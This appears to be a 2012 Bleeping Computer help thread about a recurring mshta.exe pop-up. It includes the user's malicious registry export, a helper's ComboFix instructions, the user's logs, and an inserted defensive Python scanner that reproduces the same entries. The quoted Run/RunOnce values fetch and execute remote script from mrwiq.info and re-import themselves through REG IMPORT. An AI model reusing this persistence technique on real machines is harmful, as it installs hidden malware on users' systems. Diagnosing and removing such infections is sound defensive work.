Pop up on desktop that keeps coming back


  • This topic is locked
13 replies to this topic

#1 vinnie946 (Members, 5 posts)

Posted 14 April 2012 - 09:46 AM

Hi,

Having a problem with my laptop (64-bit, Windows 7). A pop-up always comes up during startup to a webpage and only has a close button. Ending mshta.exe in Task Manager seems to close it temporarily, but it comes back after a few minutes. I've also noticed two (hidden) folders which are related to this under C:\Users, as I've not created these folders myself. One folder with an exe file called mshost.exe, a systemboot shortcut. The other with a RegWrite folder with the target: C:\Windows\System32\mshta.exe http://mrwiq.info/set_inf2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ
and also a registry file which has the following:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemBootSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="mshta.exe http://mrwiq.info/reg2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ"
"RegWriteSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="mshta.exe http://mrwiq.info/set_inf2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"RegWriteSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="REG IMPORT C:/Users/Vincent/SoftRecovery/datSCksjDDymdz0PiqvcwiQawJb8dH194dJ.reg"

Tried deleting the folders and ran Malwarebytes; it seemed to have picked up the folders as malware, but after removing/deleting them it just comes back after reboot.
I've also tried to disable it during startup with msconfig, but no luck.

I've run DDS and have the log attached.

2012-04-14 13:56:02 -------- d--h--w- C:\Users\Vincent\UserProfile
2012-04-14 13:56:02 -------- d--h--w- C:\Users\Vincent\SoftRecovery
^These two folders are the ones with the exe file and registry file

Hope there's a solution to this, and thanks for hearing me out.

Vincent

Attached Files

  • Attached File  DDS.txt   31.04KB   1 downloads
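What the registry export in the post above actually does, shown as an added example that is not part of the thread or of any tool discussed in it: a small Python scanner over the same .reg text. The sample is constructed from the post (key names, domain and cccid are taken from it; the Adobe ARM value is added only as a benign control). It flags any Run/RunOnce value whose image is a script host such as mshta.exe with a remote URL on its command line, and any RunOnce value that runs REG IMPORT, which is the part that re-creates the Run values after they are deleted. The SCRIPT_HOSTS list and the function names are the example's own.

```python
"""Scan a Windows .reg export for autorun entries that fetch a remote script
through a script host (mshta.exe and friends) and for RunOnce entries that
re-import a .reg file to restore them.  Added example; not from the thread."""
import re
import shlex
from dataclasses import dataclass

# Constructed sample: the shape of the .reg the poster found, plus one
# benign value ("Adobe ARM") added here for contrast.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemBootSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="mshta.exe http://mrwiq.info/reg2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ"
"RegWriteSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="mshta.exe http://mrwiq.info/set_inf2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ"
"Adobe ARM"="\"C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"RegWriteSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="REG IMPORT C:/Users/Vincent/SoftRecovery/datSCksjDDymdz0PiqvcwiQawJb8dH194dJ.reg"
"""

# Signed Microsoft binaries commonly abused to run attacker-supplied script.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "powershell.exe"}
AUTORUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)$", re.IGNORECASE)
VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
URL = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class Finding:
    key: str
    name: str
    command: str
    kind: str     # "remote_script_host" or "reg_reimport"
    detail: str   # the URL fetched, or the .reg file re-imported


def _unescape(s: str) -> str:
    """Undo .reg string escaping: \\ -> \ and \" -> " (left to right)."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text: str):
    """Yield (key, name, value) for every REG_SZ value in the export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and (m := VALUE_LINE.match(line)):
            yield key, _unescape(m.group(1)), _unescape(m.group(2))


def _image(command: str) -> str:
    """Lower-cased basename of the executable in a command line."""
    tokens = shlex.split(command, posix=False)   # keep Windows backslashes
    if not tokens:
        return ""
    return tokens[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def scan_autoruns(text: str) -> list[Finding]:
    """Return the suspicious Run/RunOnce values found in a .reg export."""
    findings = []
    for key, name, command in parse_reg(text):
        if not AUTORUN_KEY.search(key):
            continue
        image = _image(command)
        url = URL.search(command)
        if image in SCRIPT_HOSTS and url:
            findings.append(Finding(key, name, command,
                                    "remote_script_host", url.group(0)))
        elif image in ("reg", "reg.exe") and re.search(r"\bimport\b", command, re.I):
            parts = command.split(None, 2)
            target = parts[2].strip('"') if len(parts) > 2 else ""
            findings.append(Finding(key, name, command, "reg_reimport", target))
    return findings


def reinstall_sources(findings: list[Finding]) -> list[str]:
    """The .reg files a RunOnce entry re-imports.  These have to go before
    (or together with) the Run values, or the values return on reboot."""
    return sorted({f.detail for f in findings if f.kind == "reg_reimport"})


if __name__ == "__main__":
    hits = scan_autoruns(SAMPLE_REG)
    for h in hits:
        print(f"{h.kind:20} {h.key.rsplit(chr(92), 1)[-1]:8} {h.name[:12]}... -> {h.detail}")
    print("re-import sources:", reinstall_sources(hits))
```

Read together, the three hits explain why msconfig and deleting the folders did not help: the Run values launch mshta.exe against a remote URL every logon, and the RunOnce value re-imports a .reg file from the hidden SoftRecovery folder that writes those Run values back, so anything that removes only one side of the pair is undone at the next reboot.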



#2 gringo_pr, Bleepin Gringo (Malware Response Team, 136,772 posts, Puerto Rico)

Posted 14 April 2012 - 02:58 PM

Hello and Welcome to Bleeping Computer!!

My name is Gringo and I'll be glad to help you with your computer problems.

I have put together some things for you to keep in mind while I am helping you, to make things go easier and faster for both of us.

  • Please do not run any tools unless instructed to do so.
    • We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
  • Please do not attach logs or use code boxes, just copy and paste the text.
    • Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.
  • Please read every post completely before doing anything.
    • Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.
  • Please provide feedback about your experience as we go.
    • A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", this requires the extra step of looking back at your previous post.
NOTE: At the top of your post, click on the Watch Topic Button, select Immediate Notification, and click on Proceed. This will send you an e-mail as soon as I reply to your topic, allowing us to resolve the issue faster.

NOTE: Back up any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of heartache if things don't go as planned. You can put them on a CD/DVD, external drive or a pen drive, anywhere except on the computer.

NOTE: It is good practice to copy and paste the instructions into notepad and print them in case it is necessary for you to go offline during the cleanup process. To open notepad, navigate to Start Menu > All Programs > Accessories > Notepad. Please remember to copy the entire post so you do not miss any instructions.

Security Check

  • Download Security Check by screen317 from here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.



Run Combofix:

You may be asked to install or update the Recovery Console (Win XP only); if this happens, please allow it to do so (you will need to be connected to the internet for this).

Before you run ComboFix I will need you to turn off any security software you have running. If you do not know how to do this you can find out >here< or >here<

ComboFix may need to reboot your computer more than once to do its job; this is normal.

You can download Combofix from one of these links.
Link 1
Link 2
Link 3
1. Close any open browsers or any other programs that are open.
2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

Double click on combofix.exe & follow the prompts.
When finished, it will produce a report for you.

Note 1: Do not mouse-click ComboFix's window while it's running. That may cause it to stall.

Note 2: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." please restart the computer.

"information and logs"

  • In your next post I need the following
  • Log from Combofix
  • let me know of any problems you may have had
  • How is the computer doing now?

Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here. Don't worry, every little bit helps.

Proud Graduate Of Malware Removal University

#3 vinnie946 (Topic Starter, Members, 5 posts)

Posted 16 April 2012 - 03:26 PM

Hello, sorry for the late reply, I have been busy with some work.

The laptop seems to have gotten slower, but I'm not sure whether it's just me being paranoid :P
Also, sometimes multiple pop-ups appear; I'm not sure whether they're the same, since I disconnect my internet before they pop up so that it won't load the page, and just leave it there.

Another thing - I couldn't seem to download ComboFix right off Firefox or any other browser; I had to download it through my phone and transfer the file through USB. Again, not sure if this is just my internet being sluggish (it's been REALLY slow the past few weeks).

Here's the checkup log:

Results of screen317's Security Check version 0.99.32
Windows 7 x64 (UAC is enabled)
Internet Explorer 9
``````````````````````````````
Antivirus/Firewall Check:

Windows Firewall Disabled!
WMI entry may not exist for antivirus; attempting automatic update.
```````````````````````````````
Anti-malware/Other Utilities Check:

MVPS Hosts File
Spybot - Search & Destroy
TuneUp Utilities 2012
TuneUp Utilities Language Pack (en-US)
Java™ 6 Update 31
Adobe Reader X (10.1.2)
Mozilla Firefox (11.0.)
````````````````````````````````
Process Check:
objlist.exe by Laurent

Malwarebytes' Anti-Malware mbamservice.exe
Malwarebytes' Anti-Malware mbamgui.exe
``````````End of Log````````````


Combofix log:

ComboFix 12-04-16.02 - Vincent 16/04/2012 21:01:06.1.2 - x64
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.44.1033.18.4063.2530 [GMT 1:00]
Running from: c:\users\Vincent\Documents\BPC\ComboFix.exe
AV: ESET Smart Security 5.0 *Disabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
FW: ESET Personal firewall *Disabled* {4FE52EC8-CB26-1113-0EFE-8842E2773BAA}
SP: ESET Smart Security 5.0 *Disabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\install.exe
c:\users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegWrite.lnk
.
.
((((((((((((((((((((((((( Files Created from 2012-03-16 to 2012-04-16 )))))))))))))))))))))))))))))))
.
.
2012-04-16 20:08 . 2012-04-16 20:08 77824 ----a-w- c:\windows\KMSEmulator.exe
2012-04-16 20:07 . 2012-04-16 20:07 -------- d-----w- c:\users\Default\AppData\Local\temp
2012-04-14 15:01 . 2012-04-14 15:01 -------- d-----r- C:\Sandbox
2012-04-14 15:00 . 2012-04-14 15:00 -------- d-----w- c:\program files\Sandboxie
2012-04-14 13:56 . 2012-04-14 13:56 -------- d--h--w- c:\users\Vincent\SoftRecovery
2012-04-14 13:56 . 2012-04-14 13:56 -------- d--h--w- c:\users\Vincent\UserProfile
2012-04-14 11:39 . 2012-04-16 19:28 -------- d-----w- c:\users\Vincent\.gstreamer-0.10
2012-04-14 11:18 . 2012-04-14 11:47 -------- d-----w- c:\program files (x86)\Spybot - Search & Destroy
2012-04-14 11:18 . 2012-04-14 11:44 -------- d-----w- c:\programdata\Spybot - Search & Destroy
2012-04-14 02:57 . 2012-04-14 02:57 -------- d-----w- c:\users\Vincent\AppData\Roaming\RightsNetwork
2012-04-14 02:56 . 2012-04-14 02:58 -------- d-----w- c:\program files (x86)\RightsNetwork
2012-04-13 16:28 . 2012-04-13 16:28 -------- d--h--w- c:\programdata\Common Files
2012-04-13 13:53 . 2012-04-13 13:53 -------- d-----w- c:\program files\Windows Live
2012-04-13 13:27 . 2012-03-14 03:27 8669240 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{15F0AC75-0BD6-4D13-B4C9-FCDEF6B21E61}\mpengine.dll
2012-04-13 00:04 . 2012-04-05 11:08 25920 ----a-w- c:\windows\system32\authuitu.dll
2012-04-13 00:04 . 2012-04-05 11:08 21312 ----a-w- c:\windows\SysWow64\authuitu.dll
2012-04-12 04:17 . 2012-03-01 06:46 23408 ----a-w- c:\windows\system32\drivers\fs_rec.sys
2012-04-12 04:17 . 2012-03-01 06:33 81408 ----a-w- c:\windows\system32\imagehlp.dll
2012-04-12 04:17 . 2012-03-01 05:33 159232 ----a-w- c:\windows\SysWow64\imagehlp.dll
2012-04-12 04:17 . 2012-03-01 06:38 220672 ----a-w- c:\windows\system32\wintrust.dll
2012-04-12 04:17 . 2012-03-01 06:28 5120 ----a-w- c:\windows\system32\wmi.dll
2012-04-12 04:17 . 2012-03-01 05:37 172544 ----a-w- c:\windows\SysWow64\wintrust.dll
2012-04-12 04:17 . 2012-03-01 05:29 5120 ----a-w- c:\windows\SysWow64\wmi.dll
2012-04-11 22:47 . 2012-04-11 22:47 -------- d-----w- c:\program files (x86)\SystemRequirementsLab
2012-04-11 22:47 . 2012-04-11 22:47 -------- d-----w- c:\users\Vincent\AppData\Roaming\SystemRequirementsLab
2012-04-09 01:51 . 2012-04-09 02:02 298016 ----a-w- c:\windows\SysWow64\PnkBstrB.xtr
2012-04-09 01:51 . 2012-04-09 01:51 -------- d-----w- c:\users\Vincent\AppData\Local\PunkBuster
2012-04-09 01:27 . 2012-04-09 01:27 -------- d-----w- C:\Perfect World Entertainment
2012-04-09 01:26 . 2012-04-09 01:26 -------- d-----w- c:\windows\3F5C371F8EA24F259D3DD0B4526E3AEA.TMP
2012-04-09 01:25 . 2012-04-09 01:25 -------- d-----w- c:\program files (x86)\Common Files\Wise Installation Wizard
2012-04-09 01:25 . 2012-04-09 02:02 298016 ----a-w- c:\windows\SysWow64\PnkBstrB.exe
2012-04-09 01:25 . 2012-04-09 01:51 298016 ----a-w- c:\windows\SysWow64\PnkBstrB.ex0
2012-04-09 01:25 . 2012-04-09 01:52 76888 ----a-w- c:\windows\SysWow64\PnkBstrA.exe
2012-04-09 01:25 . 2011-12-19 14:16 3130440 ----a-w- c:\windows\SysWow64\pbsvc_blr.exe
2012-04-08 17:10 . 2012-04-08 17:10 -------- d-----w- c:\users\Vincent\AppData\Local\Skyrim
2012-04-08 16:59 . 2012-04-08 17:09 -------- d-----w- c:\program files (x86)\The Elder Scrolls V Skyrim
2012-04-08 15:44 . 2012-04-13 23:44 8741536 ----a-w- c:\windows\SysWow64\FlashPlayerInstaller.exe
2012-04-08 15:03 . 2012-04-13 23:44 418464 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2012-04-08 01:26 . 2012-04-08 01:26 -------- d-----w- c:\program files\Bonjour
2012-04-08 01:26 . 2012-04-08 01:26 -------- d-----w- c:\program files (x86)\Bonjour
2012-04-08 01:26 . 2012-04-08 01:26 -------- d-----w- c:\programdata\Apple
2012-04-08 01:09 . 2012-04-08 01:16 -------- d-----w- c:\programdata\webcamXP 5
2012-04-08 00:55 . 2012-04-08 15:01 -------- d-----w- c:\program files (x86)\ManyCam
2012-04-08 00:54 . 2012-04-08 00:54 -------- d-----w- c:\programdata\Ask
2012-04-07 23:03 . 2012-04-07 23:03 -------- d-----w- c:\users\Vincent\AppData\Roaming\Malwarebytes
2012-04-07 23:03 . 2012-04-07 23:03 -------- d-----w- c:\programdata\Malwarebytes
2012-04-07 23:03 . 2012-04-11 11:04 -------- d-----w- c:\program files (x86)\Malwarebytes' Anti-Malware
2012-04-07 23:03 . 2012-04-04 14:56 24904 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-04-07 22:50 . 2012-04-07 22:50 -------- d-----w- c:\users\UpdatusUser
2012-04-06 22:25 . 2012-04-06 22:25 -------- d-----w- c:\users\Vincent\AppData\Roaming\StreamTorrent
2012-04-06 22:05 . 2012-04-06 22:05 -------- d-----w- c:\users\Vincent\AppData\Local\Facebook
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\users\Vincent\AppData\Local\Motorola
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files (x86)\Common Files\Nero
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- C:\Binaries
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\programdata\Nero
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files (x86)\Motorola Media Link
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\programdata\Motorola
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files (x86)\Motorola Mobility
2012-04-05 21:46 . 2012-04-05 21:46 -------- d-----w- c:\program files\Motorola Inc
2012-04-05 21:44 . 2012-04-16 19:54 -------- d-----w- c:\users\Vincent\AppData\Roaming\MotoCast
2012-04-05 16:21 . 2012-04-16 19:28 -------- d-----w- c:\users\Vincent\AppData\Local\Pokki
2012-04-04 12:20 . 2012-04-04 12:20 -------- d-----w- c:\users\Vincent\AppData\Roaming\AVS4YOU
2012-04-04 02:16 . 2012-04-04 02:44 -------- d-----w- C:\Fraps
2012-03-31 14:30 . 2012-03-31 14:36 -------- d-----w- c:\program files (x86)\Amnesia - The Dark Descent
2012-03-30 21:08 . 2012-03-30 21:08 -------- d-----w- C:\NEXON
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-04-13 23:44 . 2011-12-30 22:06 70304 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2012-04-05 11:08 . 2012-03-06 21:22 34624 ----a-w- c:\windows\system32\TURegOpt.exe
2012-04-05 11:08 . 2012-03-06 21:25 35648 ----a-w- c:\windows\system32\uxtuneup.dll
2012-04-05 11:08 . 2012-03-06 21:25 28992 ----a-w- c:\windows\SysWow64\uxtuneup.dll
2012-03-14 14:23 . 2012-03-14 14:23 614400 ----a-w- c:\windows\AutoKMS.exe
2012-03-08 17:50 . 2012-03-08 17:50 49016 ----a-w- c:\windows\SysWow64\sirenacm.dll
2012-03-06 12:01 . 2012-03-06 12:01 2366920 ----a-w- c:\windows\SysWow64\ijl20.dll
2012-03-01 00:02 . 2011-12-30 21:54 9717568 ----a-w- c:\windows\system32\nvwgf2umx.dll
2012-03-01 00:02 . 2011-12-30 21:54 7713088 ----a-w- c:\windows\SysWow64\nvwgf2um.dll
2012-03-01 00:02 . 2011-12-30 21:54 2660160 ----a-w- c:\windows\system32\nvapi64.dll
2012-03-01 00:02 . 2011-12-30 21:54 2301248 ----a-w- c:\windows\SysWow64\nvapi.dll
2012-03-01 00:02 . 2011-12-30 21:54 1737536 ----a-w- c:\windows\system32\nvdispco64.dll
2012-03-01 00:02 . 2011-12-30 21:54 15009600 ----a-w- c:\windows\SysWow64\nvd3dum.dll
2012-03-01 00:02 . 2011-12-30 21:54 1466176 ----a-w- c:\windows\system32\nvgenco64.dll
2012-02-29 21:00 . 2011-12-30 21:54 3089728 ----a-w- c:\windows\system32\nvsvc64.dll
2012-02-29 21:00 . 2011-12-30 21:54 6074176 ----a-w- c:\windows\system32\nvcpl.dll
2012-02-29 20:59 . 2011-12-30 21:54 889664 ----a-w- c:\windows\system32\nvvsvc.exe
2012-02-29 20:59 . 2011-12-30 21:54 63296 ----a-w- c:\windows\system32\nvshext.dll
2012-02-29 20:59 . 2011-12-30 21:54 2561856 ----a-w- c:\windows\system32\nvsvcr.dll
2012-02-29 20:59 . 2011-12-30 21:54 118080 ----a-w- c:\windows\system32\nvmctray.dll
2012-02-28 21:54 . 2012-01-07 15:17 472808 ----a-w- c:\windows\SysWow64\deployJava1.dll
2012-02-27 12:38 . 2012-02-27 12:38 2782848 ----a-w- c:\windows\system32\drivers\kinonivd.sys
2012-02-27 12:38 . 2012-02-27 12:38 23040 ----a-w- c:\windows\system32\drivers\kinonivad.sys
2012-02-23 09:18 . 2011-12-30 21:45 279656 ------w- c:\windows\system32\MpSigStub.exe
2012-02-22 10:34 . 2012-02-22 10:34 28160 ----a-w- c:\windows\system32\drivers\mcaudrv_x64.sys
2012-02-17 06:38 . 2012-03-14 14:05 1112064 ----a-w- c:\windows\system32\rdpcorets.dll
2012-02-17 06:38 . 2012-03-14 14:05 1031680 ----a-w- c:\windows\system32\rdpcore.dll
2012-02-17 05:34 . 2012-03-14 14:05 826880 ----a-w- c:\windows\SysWow64\rdpcore.dll
2012-02-17 04:58 . 2012-03-14 14:05 210944 ----a-w- c:\windows\system32\drivers\rdpwd.sys
2012-02-17 04:57 . 2012-03-14 14:05 23552 ----a-w- c:\windows\system32\drivers\tdtcp.sys
2012-02-10 06:36 . 2012-03-14 14:06 1544192 ----a-w- c:\windows\system32\DWrite.dll
2012-02-10 05:38 . 2012-03-14 14:06 1077248 ----a-w- c:\windows\SysWow64\DWrite.dll
2012-02-03 04:34 . 2012-03-14 14:06 3145728 ----a-w- c:\windows\system32\win32k.sys
2012-01-25 12:58 . 2012-01-25 12:58 27136 ----a-w- c:\windows\system32\drivers\Motousbnet.sys
2012-01-25 12:57 . 2012-01-25 12:57 30720 ----a-w- c:\windows\system32\drivers\motmodem.sys
2012-01-25 12:57 . 2012-01-25 12:57 9728 ----a-w- c:\windows\system32\drivers\motccgpfl.sys
2012-01-25 12:57 . 2012-01-25 12:57 22016 ----a-w- c:\windows\system32\drivers\motccgp.sys
2012-01-25 06:38 . 2012-03-14 14:05 77312 ----a-w- c:\windows\system32\rdpwsx.dll
2012-01-25 06:38 . 2012-03-14 14:05 149504 ----a-w- c:\windows\system32\rdpcorekmts.dll
2012-01-25 06:33 . 2012-03-14 14:05 9216 ----a-w- c:\windows\system32\rdrmemptylst.exe
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Pokki"="c:\users\Vincent\AppData\Local\Pokki\v0.252\pokki.exe" [2012-04-13 2540856]
"MotoCast"="c:\program files (x86)\Motorola Mobility\MotoCast\MotoLauncher.lnk" [2012-04-05 2051]
"Facebook Update"="c:\users\Vincent\AppData\Local\Facebook\Update\FacebookUpdate.exe" [2012-04-06 137536]
"SpybotSD TeaTimer"="c:\program files (x86)\Spybot - Search & Destroy\TeaTimer.exe" [2009-03-05 2260480]
"SandboxieControl"="c:\program files\Sandboxie\SbieCtrl.exe" [2012-04-10 668944]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"YouCam Service"="c:\program files (x86)\CyberLink\YouCam\YouCamService.exe" [2011-09-09 247016]
"SwitchBoard"="c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe" [2010-02-19 517096]
"AdobeCS5ServiceManager"="c:\program files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" [2010-02-22 406992]
"BCSSync"="c:\program files (x86)\Microsoft Office\Office14\BCSSync.exe" [2010-01-21 91520]
"Malwarebytes' Anti-Malware"="c:\program files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe" [2012-04-04 462408]
.
c:\users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Facebook Messenger.lnk - c:\users\Vincent\AppData\Local\Facebook\Messenger\2.0.4478.0\FacebookMessenger.exe [2012-4-5 204288]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Security Packages REG_MULTI_SZ kerberos msv1_0 schannel wdigest tspkg pku2u livessp
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\run-]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe"
.
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-03-18 130384]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-03-18 138576]
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-13 253088]
R3 BTCFilterService;USB Networking Driver Filter Service;c:\windows\system32\DRIVERS\motfilt.sys [x]
R3 EagleX64;EagleX64;c:\windows\system32\drivers\EagleX64.sys [x]
R3 KINONI_Wave;Kinoni Audio Source;c:\windows\system32\drivers\kinonivad.sys [x]
R3 kinonivd;Kinoni Video Source;c:\windows\system32\DRIVERS\kinonivd.sys [x]
R3 ManyCam;ManyCam Virtual Webcam;c:\windows\system32\DRIVERS\mcvidrv_x64.sys [x]
R3 mcaudrv_simple;ManyCam Virtual Microphone;c:\windows\system32\drivers\mcaudrv_x64.sys [x]
R3 motandroidusb;Mot ADB Interface Driver;c:\windows\system32\Drivers\motoandroid.sys [x]
R3 motccgp;Motorola USB Composite Device Driver;c:\windows\system32\DRIVERS\motccgp.sys [x]
R3 motccgpfl;MotCcgpFlService;c:\windows\system32\DRIVERS\motccgpfl.sys [x]
R3 Motousbnet;Motorola USB Networking Driver Service;c:\windows\system32\DRIVERS\Motousbnet.sys [x]
R3 NMgamingmsFltr;USB Optical Mouse;c:\windows\system32\drivers\NMgamingms.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [x]
R3 SwitchBoard;SwitchBoard;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-02-19 517096]
R3 Synth3dVsc;Synth3dVsc;c:\windows\system32\drivers\synth3dvsc.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [x]
R3 tsusbhub;tsusbhub;c:\windows\system32\drivers\tsusbhub.sys [x]
R3 VGPU;VGPU;c:\windows\system32\drivers\rdvgkmd.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [x]
R3 WDC_SAM;WD SCSI Pass Thru driver;c:\windows\system32\DRIVERS\wdcsam64.sys [x]
S0 epfwwfp;epfwwfp;c:\windows\system32\DRIVERS\epfwwfp.sys [x]
S1 ehdrv;ehdrv;c:\windows\system32\DRIVERS\ehdrv.sys [x]
S1 EpfwLWF;Epfw NDIS LightWeight Filter;c:\windows\system32\DRIVERS\EpfwLWF.sys [x]
S1 vwififlt;Virtual WiFi Filter Driver;c:\windows\system32\DRIVERS\vwififlt.sys [x]
S2 AdobeARMservice;Adobe Acrobat Update Service;c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2012-01-03 63928]
S2 AESTFilters;Andrea ST Filters Service;c:\windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe [2009-03-02 89600]
S2 DeviceMonitorService;DeviceMonitorService;c:\program files (x86)\Motorola Media Link\Lite\NServiceEntry.exe [2012-02-16 87368]
S2 eamonm;eamonm;c:\windows\system32\DRIVERS\eamonm.sys [x]
S2 ekrn;ESET Service;c:\program files\ESET\ESET Smart Security\x86\ekrn.exe [2011-09-22 974944]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [2012-04-04 654408]
S2 MotoHelper;MotoHelper Service;c:\program files (x86)\Motorola\MotoHelper\MotoHelperService.exe [2012-02-01 214896]
S2 nvUpdatusService;NVIDIA Update Service Daemon;c:\program files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe [2012-03-01 2348352]
S2 SBSDWSCService;SBSD Security Center Service;c:\program files (x86)\Spybot - Search & Destroy\SDWinSec.exe [2009-01-26 1153368]
S2 TuneUp.UtilitiesSvc;TuneUp Utilities Service;c:\program files (x86)\TuneUp Utilities 2012\TuneUpUtilitiesService64.exe [2012-04-05 2143552]
S3 clwvd;CyberLink WebCam Virtual Driver;c:\windows\system32\DRIVERS\clwvd.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [x]
S3 NETw5s64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows 7 - 64 Bit;c:\windows\system32\DRIVERS\NETw5s64.sys [x]
S3 NVHDA;Service for NVIDIA High Definition Audio Driver;c:\windows\system32\drivers\nvhda64v.sys [x]
S3 osppsvc;Office Software Protection Platform;c:\program files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-01-09 4925184]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys [x]
